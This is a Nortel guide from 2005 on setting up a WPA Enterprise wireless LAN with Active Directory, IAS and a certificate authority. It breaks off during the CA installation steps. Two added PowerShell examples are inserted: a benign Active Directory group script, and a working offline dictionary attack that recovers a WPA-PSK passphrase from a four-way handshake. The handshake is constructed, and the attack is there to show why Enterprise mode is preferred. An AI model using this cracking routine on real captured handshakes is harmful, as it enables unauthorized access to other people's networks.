csx_adaptive_for_ms_env

By Evelyn Richardson,2014-10-18 01:52

    The Adaptive Wireless LAN COOKBOOK for Microsoft environment

    A total guide to setting up a secure Nortel Adaptive Wireless LAN in a Microsoft environment

Version 1.0

    January 4th, 2005

K.P. Rao

    Core Systems Engineering

Abstract

    This document is intended to assist Sales Engineers and Nortel customers with configuring the Nortel Adaptive Wireless LAN solution in a Microsoft environment. Currently this information is scattered across various places and is very disjointed. The main objective of the document is to gather all these pieces together, provide clarification, and show step by step, in a logical order, how to build and configure end to end each of the pieces required for the solution.

Acknowledgements

    This document could not have been completed without the help of the following contributors and reviewers (listed in no particular order): Louis Denoncourt, Victor Ganjan, Douglas DiNunzio and Pam O'Hagan

    Copyright ©

    All rights reserved. January 2005

    The information in this document is subject to change without notice. The statements, configurations, technical data, and recommendations in this document are believed to be accurate and reliable, but are presented without express or implied warranty. Users must take full responsibility for their applications of any products specified in this document. The information in this document is proprietary to Nortel Networks Inc.

    The software described in this document is furnished under a license agreement and may be used only in accordance with the terms of that license.

Trademarks

    Nortel Networks, the Nortel Networks logo, the Globemark, Unified Networks, and PASSPORT are trademarks of Nortel Networks.

Adobe and Acrobat Reader are trademarks of Adobe Systems Incorporated.

All other Trademarks are the property of their respective owners.

Nortel Adaptive Wireless LAN COOKBOOK 01/10/2005 Page 2

Table of Contents

ABSTRACT ................................................................ 2
ACKNOWLEDGEMENTS ................................................................ 2
COPYRIGHT © ................................................................ 2
TRADEMARKS ................................................................ 2
INTRODUCTION ................................................................ 4
LAB SETUP DIAGRAM ................................................................ 4
CODE LEVELS USED IN THIS DOCUMENT ................................................................ 4
CONFIGURATION TASKS ................................................................ 5
    Planning the Wireless LAN ................................................................ 5
    Domain controller installation and creation of Users and Groups ................................................................ 6
        Creating Users and Groups ................................................................ 7
    Installing and configuring the Certificate Authority (CA) for the domain ................................................................ 10
    Exporting the Root Certificate ................................................................ 11
    Configuring the DHCP server ................................................................ 13
        2230 boot up sequence ................................................................ 13
        Configuring the DHCP relay ................................................................ 14
        Layer 3 mode and DHCP interaction ................................................................ 15
        Provision the DHCP server ................................................................ 15
    Installing and configuring the 2270 / 2230 ................................................................ 19
    Configuring the IAS server ................................................................ 22
    Setting up the Routing & Remote Access Service ................................................................ 30
TEST THE SOLUTION ................................................................ 31
    Windows 2K and Nortel supplicant ................................................................ 31
    Windows XP and native XP supplicant ................................................................ 34
    This concludes the setup and testing of clients. ................................................................ 38
REFERENCES ................................................................ 39
APPENDIX A: CONNECTION ACCEPT, REJECT LOGIC IN IAS ................................................................ 40


Introduction

    With security related issues addressed to a large extent, Wireless LAN is seeing exponential growth in enterprise adoption and deployment. Seamless integration of Wireless LAN into an enterprise infrastructure, with regard to single sign-on and secure access, is essential to give end users a secure, safe and high-quality experience. A quick survey shows that a large number of enterprises run a Microsoft environment with Active Directory as the corporate directory, Exchange for e-mail, IAS as the RADIUS server, and Microsoft DHCP and DNS servers. The Nortel Networks Adaptive Wireless LAN portfolio not only integrates seamlessly into this environment but provides much more in terms of value added functions such as rogue device detection and location and Auto RF, to name a few. The technical details required for configuring the various backend components (DHCP, RADIUS and security) for the Nortel Adaptive Wireless LAN solution are scattered in various places. This multipart document is an attempt to consolidate all that information in a single place. Part I of the document focuses on how to set up an adaptive solution in L3 mode in a Microsoft environment. This document does not go into a detailed discussion of how to set up the Microsoft environment itself; details on that can be found in the references provided in the appendix.

Lab setup diagram

    The simulated Microsoft environment, as shown in the diagram below, uses Microsoft Windows 2000 Server and Windows 2003 Server (Enterprise Edition). Services such as Domain Controllers, Active Directory, DNS, DHCP, and Internet Authentication Service (Microsoft's RADIUS server) are installed on these machines as shown in the diagram below.

Code levels used in this document


    The software revisions of the various devices used in this document are as follows:

    - Client OS and supplicant software:
      o Windows XP Professional SP2 with native supplicant
      o Windows 2000 Professional SP4 with Nortel Networks WLAN Mobility Adapter Utility
    - Client wireless network interface card used for testing:
      o Nortel Networks Wireless LAN 2201
    - Servers:
      o Windows 2003 Server with Service Pack 1
      o Windows 2000 Server with Service Pack 4
      o Microsoft IAS, DHCP and PKI
    - Nortel Adaptive Wireless LAN equipment:
      o 2270 SW / RTOS / Bootloader version: 2.0.152.0
      o 2230 SW version: 2.0.152.0, Boot version: 1.2.59.6

Configuration Tasks

    The steps involved in configuring the solution shown in the diagram can be broken down into the following tasks:

    1) Planning the Wireless LAN

    2) Domain controllers installation and creation of Users and Groups

    3) Install the CA (Certificate Authority) for the domain

    4) Exporting the Root Certificate

    5) Install and configure DHCP server

    6) Install and configure the 2270 / 2230

    7) Configure the IAS (RADIUS) server

    8) Configure the clients

    9) Test the solution

     Planning the Wireless LAN

    An in-depth discussion of this topic is beyond the scope of this document. There are a number of guides and documents available from Nortel Networks to help you with planning a Wireless LAN. A few are listed below and can be found at

    http://qos.ca.nortel.com/QoS-News.html

    - Engineering a WLAN Network
    - Straight Talk on Voice over Wireless LANs
    - New QoS for Wi-Fi Multimedia paper

    For our case study, a site survey was done and the placement of the Access Ports was determined accordingly. In the planning process, it was decided that the maximum level of security at layer 2 (of the OSI model) would be enforced using Enterprise mode WPA (Wi-Fi Protected Access). WPA addresses the security shortcomings of the Wired Equivalent Privacy (WEP) protocol in 802.11 based wireless networks. WPA is a subset of the 802.11i security standard. WPA uses TKIP (Temporal Key Integrity Protocol), which is designed to improve the confidentiality and integrity of wireless LAN data. TKIP provides "stronger" keys via a longer (48-bit) initialization vector and a per-packet key-mixing function, stronger sequencing rules to prevent replay attacks, and a MIC (Message Integrity Code) to ensure that the packet has not been altered in transit. Note that TKIP was designed as an interim fix that could run on WEP-era hardware; the full 802.11i standard (WPA2) replaced it with AES-CCMP, and TKIP has since been deprecated, so where both the clients and the Access Ports support WPA2, prefer AES-CCMP over TKIP.

    WPA runs in two modes, a Pre-Shared Key (PSK) mode and an Enterprise mode. PSK mode is geared to the SOHO market and means that the same key (a passphrase, from which the pairwise master key is derived) is statically configured on both the WLAN client and the AP, so it is shared by every client and must be changed on all of them whenever it is compromised. In Enterprise mode the existing 802.1X (port-based access control), EAP (Extensible Authentication Protocol) and RADIUS protocols are used for authentication and for distribution of a dynamically generated, per-session key.
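    The difference between the two modes, as an added example that is not part of the cookbook: the PowerShell below derives the PSK-mode PMK and PTK the way 802.11i specifies (the PBKDF2 step is checked against the standard's own test vector for passphrase "password" and SSID "IEEE"), computes the EAPOL-Key MIC of a constructed message 2 of the four-way handshake, and then recovers the passphrase from that single handshake with a short wordlist. The SSID, MAC addresses, nonces, passphrase and wordlist are all constructed for the demonstration, not captured from any network. In Enterprise mode the same PTK derivation runs, but the PMK is taken from the EAP exchange (the first 32 bytes of the Master Session Key that the RADIUS server delivers), so it is fresh for every session and cannot be guessed offline.

```powershell
# Added example (not from the cookbook). Derives WPA keys as 802.11i does and runs the
# offline dictionary attack that one captured four-way handshake allows against PSK mode.
# All handshake values below are constructed for the demonstration, not captured.

function Get-WpaPmk {
    param([string]$Passphrase, [string]$Ssid)
    # PSK mode: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    # The same PMK serves every client and every session until the passphrase changes.
    $salt = [System.Text.Encoding]::ASCII.GetBytes($Ssid)
    $kdf  = [System.Security.Cryptography.Rfc2898DeriveBytes]::new($Passphrase, $salt, 4096)
    Write-Output -NoEnumerate $kdf.GetBytes(32)
}

function Join-Ordered {
    param([byte[]]$A, [byte[]]$B)
    # 802.11i concatenates each pair (MACs, nonces) as min || max, compared byte-wise
    $cmp = [string]::CompareOrdinal([System.BitConverter]::ToString($A), [System.BitConverter]::ToString($B))
    if ($cmp -le 0) { Write-Output -NoEnumerate ([byte[]]($A + $B)) }
    else            { Write-Output -NoEnumerate ([byte[]]($B + $A)) }
}

function Get-WpaPtk {
    param([byte[]]$Pmk, [byte[]]$ApMac, [byte[]]$StaMac, [byte[]]$ANonce, [byte[]]$SNonce)
    # PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(AN,SN)||max(AN,SN)):
    # HMAC-SHA1(PMK, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes.
    $label = [System.Text.Encoding]::ASCII.GetBytes('Pairwise key expansion')
    $data  = [byte[]]((Join-Ordered $ApMac $StaMac) + (Join-Ordered $ANonce $SNonce))
    $hmac  = [System.Security.Cryptography.HMACSHA1]::new($Pmk)
    $ptk   = [System.Collections.Generic.List[byte]]::new()
    for ($i = 0; $i -lt 4; $i++) {
        $ptk.AddRange($hmac.ComputeHash([byte[]]($label + [byte]0 + $data + [byte]$i)))
    }
    # KCK = bytes 0-15 (signs EAPOL-Key frames), KEK = 16-31, temporal key = 32-63
    Write-Output -NoEnumerate ([byte[]]$ptk.GetRange(0, 64).ToArray())
}

function Get-EapolKeyMic {
    param([byte[]]$Kck, [byte[]]$Frame, [int]$DescriptorVersion = 1)
    # MIC over the EAPOL-Key frame with its 16-byte MIC field (offset 81) zeroed.
    # Version 1 (WPA/TKIP, as in this cookbook): HMAC-MD5. Version 2 (WPA2/CCMP): HMAC-SHA1-128.
    $zeroed = [byte[]]$Frame.Clone()
    for ($i = 81; $i -lt 97; $i++) { $zeroed[$i] = 0 }
    $h = [System.Security.Cryptography.HMACSHA1]::new($Kck)
    if ($DescriptorVersion -eq 1) { $h = [System.Security.Cryptography.HMACMD5]::new($Kck) }
    Write-Output -NoEnumerate ([byte[]]$h.ComputeHash($zeroed)[0..15])
}

function Find-WpaPassphrase {
    param([string[]]$Wordlist, [string]$Ssid, [hashtable]$Handshake)
    # The attacker needs only the SSID, both MACs, both nonces, message 2 and its MIC.
    $wanted = [System.BitConverter]::ToString($Handshake.Mic)
    foreach ($candidate in $Wordlist) {
        $pmk = Get-WpaPmk -Passphrase $candidate -Ssid $Ssid
        $ptk = Get-WpaPtk -Pmk $pmk -ApMac $Handshake.ApMac -StaMac $Handshake.StaMac `
                          -ANonce $Handshake.ANonce -SNonce $Handshake.SNonce
        $mic = Get-EapolKeyMic -Kck $ptk[0..15] -Frame $Handshake.Msg2
        if ([System.BitConverter]::ToString($mic) -eq $wanted) { return $candidate }
    }
    return $null
}

# Known-answer test from IEEE 802.11i-2004 Annex H: passphrase "password", SSID "IEEE"
$kat = ([System.BitConverter]::ToString([byte[]](Get-WpaPmk 'password' 'IEEE')) -replace '-').ToLower()
if ($kat -ne 'f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e') { throw 'PBKDF2 known-answer test failed' }

# Constructed handshake: SSID "corp-wlan" protected with the weak passphrase "welcome1"
$ssid   = 'corp-wlan'
$apMac  = [byte[]](0x00, 0x0E, 0x62, 0x10, 0x20, 0x30)
$staMac = [byte[]](0x00, 0x0E, 0x62, 0x40, 0x50, 0x60)
$aNonce = [byte[]](1..32)
$sNonce = [byte[]](201..232)
$msg2   = [byte[]]::new(99)                 # EAPOL-Key message 2/4 without key data
$msg2[0] = 1; $msg2[1] = 3; $msg2[3] = 95   # EAPOL version 1, type Key, body length
$msg2[4] = 254                              # WPA key descriptor type
$msg2[5] = 0x01; $msg2[6] = 0x09            # key info: version 1, pairwise, MIC present
[Array]::Copy($sNonce, 0, $msg2, 17, 32)    # SNonce field
$realPtk = Get-WpaPtk -Pmk (Get-WpaPmk 'welcome1' $ssid) -ApMac $apMac -StaMac $staMac -ANonce $aNonce -SNonce $sNonce
$mic = Get-EapolKeyMic -Kck $realPtk[0..15] -Frame $msg2
[Array]::Copy($mic, 0, $msg2, 81, 16)       # the frame as the supplicant transmits it

$handshake = @{ ApMac = $apMac; StaMac = $staMac; ANonce = $aNonce; SNonce = $sNonce; Msg2 = $msg2; Mic = $mic }
$found = Find-WpaPassphrase -Wordlist @('password', 'letmein', 'welcome1', 'summer2005') -Ssid $ssid -Handshake $handshake
"Recovered PSK passphrase: $found"
```

    Runs in Windows PowerShell 5.1 or PowerShell 7 and prints the recovered passphrase. The attacker's cost is one PBKDF2 run (4096 HMAC-SHA1 iterations) per candidate, which GPU crackers do at hundreds of thousands of guesses per second, so PSK mode is only defensible where the passphrase is long, random and shared with very few devices; for a corporate WLAN the Enterprise mode chosen above is the right call.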

    Access Ports will be (logically) placed inside the corporate LAN, and the Wireless LAN will be treated as a secure, trusted portion of the network. This is illustrated in the network topology shown in the Lab setup diagram section above.

Domain controller installation and creation of Users and Groups

    Domain Controllers store directory data and manage user and domain interactions, including user logon, authentication and directory searches. To configure a server as a domain controller, install Active Directory on the server by running the Active Directory Installation Wizard. Details on how to install Active Directory can be found at http://www.microsoft.com . Alternatively, refer to the application notes below for the same information.

    1) To install AD on Windows 2000 Server: http://worcester.us.nortel.com/AD-Win2000

    2) To install AD on Windows 2003 Server: http://navigate.us.nortel.com/AD-Win2003

    Typically, in a customer environment, domain controller(s) would already be installed and configured with user profiles. When adding Wireless LAN components to the network, the design should keep the network access method the same for end users: whatever method was used to access the network via the wired LAN should also work for the wireless LAN. In a Microsoft environment, access to the network via Wireless LAN is treated as remote access. Network access is typically controlled by setting the dial-in permission on the domain account of the user or computer. However, controlling access for a large number of users with this method is extremely cumbersome. Moreover, it is an "all-or-nothing" setting, which means that you cannot allow VPN access while simultaneously blocking wireless access (or vice versa) for a given user.

    Internet Authentication Service (IAS) allows you to control access to network services using groups associated with a remote access policy. This method is more flexible and much easier to manage because it allows you to use group memberships to govern access to a network service.

    With the user access methods mentioned above, two broad schemes are possible:

    1) In the first scheme, which is simple to manage, you allow all domain users and computers access to the WLAN. This can be accomplished by creating nested groups as shown in Table 1. For many organizations, controlling access through domain membership is a strong enough control and minimizes the additional management overhead associated with the WLAN. The group in the first column, Wireless LAN Access, has two members listed in the second column, namely Wireless LAN Users and Wireless LAN Computers. These "First Level" groups themselves have members (shown in the third column, "Second Level Members"), namely the Domain Users and Domain Computers groups respectively. This arrangement of nested groups allows all users and computers in the domain to connect to the WLAN.

    Table 1: Wireless Access Groups to Allow All Users and Computers

    2) In the second scheme, if allowing all users and computers to access the WLAN is overly permissive for your organization, you can remove either or both of Domain Users and Domain Computers from these groups. You will then need to add the specific user and computer accounts or groups to the Wireless LAN groups. Table 2 illustrates how to use the Wireless LAN Access group structure in this manner.

    Table 2: Wireless Access Groups to Allow Selected Users and Computers

    Corporate policy of a fictitious corporation dictates that all computers in the domain have wireless access but only certain users be allowed wireless access. This requires that we implement a combination of the two schemes as follows. At present, only three users from the domain are given access to the Wireless LAN for the trial as shown below.

    Top Level Universal Group      First Level Members          Second Level Members
    (Granted Access in RAP)        (Domain Global Groups)       (Domain Global Groups)
    ---------------------------    -------------------------    -------------------------------------------
    Wireless LAN Access            Wireless LAN Users           krao, tbiggs, elee
                                   Wireless LAN Computers       Domain Computers (krao-1, tbiggs-1, elee-1)

    Now that we have our directory structure planned, we can now go ahead and create the users and the respective groups as shown above.

Creating Users and Groups

    Before we start creating users and groups, let us take a look at how the Domain Controllers are structured in our environment. We have two Domain Controllers in our network for redundancy. One Domain Controller runs on Windows 2000 Server and its domain operation mode is "Native". The other Domain Controller runs on Windows 2003 Server and its domain functional level is "Windows 2000 native". This is shown in the diagram below.

    When the Domain Controller(s) run in this mode, the default Remote Access Permission on the Dial-in tab of the user properties is "Control access through Remote Access Policy". Thus, when provisioning users, we do not have to modify the Dial-in properties to allow remote access. (In a mixed-mode domain that option is not available and the default is "Deny access", which would have to be changed on every account.) For more details on how the access control logic works in IAS, see Appendix A: Connection accept, reject logic in IAS.

    [Diagram: Windows 2000 DC running in Native mode; Windows 2003 DC running in Windows 2000 native mode]

    To add users / groups in Active Directory, log on to any one of the Domain Controllers and, from the Start button, click "Programs > Administrative Tools > Active Directory Users and Computers".

    1. Right click on the "Users" folder and select "New > User". Add the user "krao" as shown below. When finished creating user "krao", add users "tbiggs" and "elee" in the same manner.

    2. Create the two groups "Wireless LAN Users" and "Wireless LAN Computers". These are the First Level groups. Make sure that the Group scope is Global and the Group type is Security. The creation of the "Wireless LAN Users" group is shown below. Create the "Wireless LAN Computers" group in the same fashion.

    3. With the First Level group(s) in place, we now need to add users and computers to the appropriate groups. In the Active Directory Users and Computers dialogue box, locate the "Wireless LAN Users" group and double click on it. Move to the Members tab. By default it will have "Domain Users" as a member of the group. Remove it and add the users as shown below. Leave the default settings for the "Wireless LAN Computers" group, as it will have all "Domain Computers" as members of the group.

    4. Once the First Level group(s) are created and populated with users and computers, we proceed to create the Top Level group. It is called "Wireless LAN Access" and is created with Group Scope "Universal" and Group Type "Security". The First Level groups (Wireless LAN Users and Wireless LAN Computers) are made members of this (Wireless LAN Access) group as shown below.


    This completes configuration on the Domain Controller for users and groups.
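    The same group structure built from the command line, as an added example that is not part of the cookbook (which does all of this in the Active Directory Users and Computers GUI). It assumes the ActiveDirectory PowerShell module (RSAT on Windows Server 2008 R2 or later, so not the Windows 2000/2003 lab described here) and a domain admin session; the user and group names are the cookbook's. It covers the two access schemes and the four provisioning steps above, and then checks the two things IAS will actually evaluate: effective membership of "Wireless LAN Access" once nesting is resolved, and that no trial account carries an explicit dial-in Allow or Deny, which would override the remote access policy regardless of group membership.

```powershell
# Added example (not from the cookbook). Requires the ActiveDirectory module and domain admin rights.
Import-Module ActiveDirectory

$trialUsers = 'krao', 'tbiggs', 'elee'
$domain     = (Get-ADDomain).DNSRoot

# Step 1: the trial user accounts (password prompted, must be changed at first logon)
foreach ($u in $trialUsers) {
    if (-not (Get-ADUser -Filter "SamAccountName -eq '$u'")) {
        New-ADUser -Name $u -SamAccountName $u -UserPrincipalName "$u@$domain" `
            -AccountPassword (Read-Host -AsSecureString "Initial password for $u") `
            -Enabled $true -ChangePasswordAtLogon $true
    }
}

# Step 2: First Level groups are Global scope, Security type
New-ADGroup -Name 'Wireless LAN Users'     -GroupScope Global -GroupCategory Security
New-ADGroup -Name 'Wireless LAN Computers' -GroupScope Global -GroupCategory Security

# Step 3: scheme 2 for users (named accounts only, Domain Users must not be nested),
#         scheme 1 for computers (Domain Computers nested, so every domain-joined machine qualifies)
if (Get-ADGroupMember 'Wireless LAN Users' | Where-Object SamAccountName -eq 'Domain Users') {
    Remove-ADGroupMember -Identity 'Wireless LAN Users' -Members 'Domain Users' -Confirm:$false
}
Add-ADGroupMember -Identity 'Wireless LAN Users'     -Members $trialUsers
Add-ADGroupMember -Identity 'Wireless LAN Computers' -Members 'Domain Computers'

# Step 4: Top Level group is Universal scope, Security type; this is the group the IAS remote access policy names
New-ADGroup -Name 'Wireless LAN Access' -GroupScope Universal -GroupCategory Security
Add-ADGroupMember -Identity 'Wireless LAN Access' -Members 'Wireless LAN Users', 'Wireless LAN Computers'

# Check 1: effective (nested) membership, which is how IAS group matching resolves it
$effective = Get-ADGroupMember -Identity 'Wireless LAN Access' -Recursive |
             Select-Object -ExpandProperty SamAccountName
foreach ($u in $trialUsers) {
    if ($effective -notcontains $u) { Write-Warning "$u is not an effective member of Wireless LAN Access" }
}

# Check 2: msNPAllowDialin TRUE/FALSE is the account's explicit Allow/Deny and overrides the policy
#          for every access type; unset means "Control access through Remote Access Policy"
foreach ($u in $trialUsers) {
    $acct = Get-ADUser -Identity $u -Properties msNPAllowDialin
    if ($null -ne $acct.msNPAllowDialin) {
        Write-Warning "$u has an explicit dial-in permission ($($acct.msNPAllowDialin)); clearing it so the policy decides"
        Set-ADUser -Identity $u -Clear msNPAllowDialin
    }
}
```

    The second check is worth keeping as a periodic audit: an account that was once given "Allow access" for VPN will be admitted to the WLAN no matter what the wireless policy says, which is exactly the all-or-nothing problem described earlier.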

Installing and configuring the Certificate Authority (CA) for the domain

    A server certificate needs to be issued to the RADIUS (IAS) server. The IAS server needs the certificate to create the TLS-protected tunnel between the wireless client (the supplicant) and itself; the client validates this certificate to make sure it is talking to the real RADIUS server rather than a rogue one, so the certificate must chain to a root the clients trust. To provide such certificates, you can either install a CA yourself or buy the certificates from a commercial certificate provider. Both options are valid and, technically, there is no real difference between them. The major pros and cons of using an in-house CA compared to buying certificates from a commercial provider are summarized in the following table.

    Table 3: Pros and Cons of Using Your Own CA vs. Commercial Certificates

    The balance of the argument depends on how complex and costly it is to manage your own CA. If the cost of setting up a local CA is low and the management is simple, it is often a more attractive proposition than purchasing external certificates.

    Since the CA software ships with standard Microsoft Windows 2000 or 2003 server, the fictitious organization decided to install an in-house CA because of the advantages inherent to it. Automatic enrollment and renewal of the IAS server certificate means that there is no manual certificate distribution to perform.

    A decision was made to install the CA on the Windows 2000 Domain Controller. By default, the Certificate Services package is not installed. You will need the Windows 2000 installation media to install the package. Place the Windows 2000 installation media in the CD drive and go to Start > Settings > Control Panel > Add/Remove Programs and install the package as shown below.

